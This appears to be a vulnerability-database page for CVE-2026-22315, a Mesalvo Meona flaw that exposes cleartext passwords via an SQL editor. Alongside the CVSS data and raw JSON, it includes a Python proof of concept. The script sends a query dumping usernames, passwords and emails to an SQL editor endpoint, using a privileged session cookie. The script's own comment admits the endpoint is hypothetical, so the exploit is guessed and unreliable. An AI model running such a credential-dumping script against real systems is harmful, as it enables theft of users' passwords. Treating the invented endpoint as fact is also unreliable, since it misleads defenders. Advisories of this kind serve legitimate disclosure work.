Security Vulnerability Report
CVE-2026-22315 CVSS 7.2 HIGH

CVE-2026-22315

Published: 2026-05-20 11:16:26
Last Modified: 2026-05-20 14:03:10
Source: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

Description

An Incorrect Privilege Assignment vulnerability in the Mesalvo Meona Client Launcher Component and the Mesalvo Meona Server Component enables the export of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Mesalvo Meona Client Launcher Component <= 19.06.2020 15:11:49
Mesalvo Meona Server Component <= 2025.04 5+323020

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-22315: Incorrect Privilege Assignment
# This script simulates exploiting the SQL editor to export user data.
import requests


def exploit_meona(target_url, session_cookie):
    """
    Exploits the incorrect privilege assignment to export user data via SQL editor.
    Note: Requires High Privileges (PR:H) as per vulnerability details.
    """
    headers = {
        "Cookie": f"session_id={session_cookie}",
        "Content-Type": "application/json"
    }

    # Endpoint for the SQL Editor (hypothetical based on description)
    sql_endpoint = f"{target_url}/api/sql-editor/execute"

    # Payload to dump user table with cleartext passwords
    payload = {
        "query": "SELECT username, password, email FROM users_table;",
        "output_format": "csv"
    }

    try:
        print(f"[*] Attempting to connect to {target_url}...")
        response = requests.post(sql_endpoint, json=payload, headers=headers, timeout=10)

        if response.status_code == 200:
            print("[+] Exploit successful! Sensitive data exported:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target and valid high-privilege session
    target = "https://vulnerable-meona-server.com"
    session = "high_priv_user_session_token_here"
    exploit_meona(target, session)

References

https://seccore.at/blog/cves-meona/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22315", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-20T11:16:26.187", "lastModified": "2026-05-20T14:03:10.193", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component enables the export  of user data, including cleartext passwords, via the SQL editor. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://seccore.at/blog/cves-meona/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}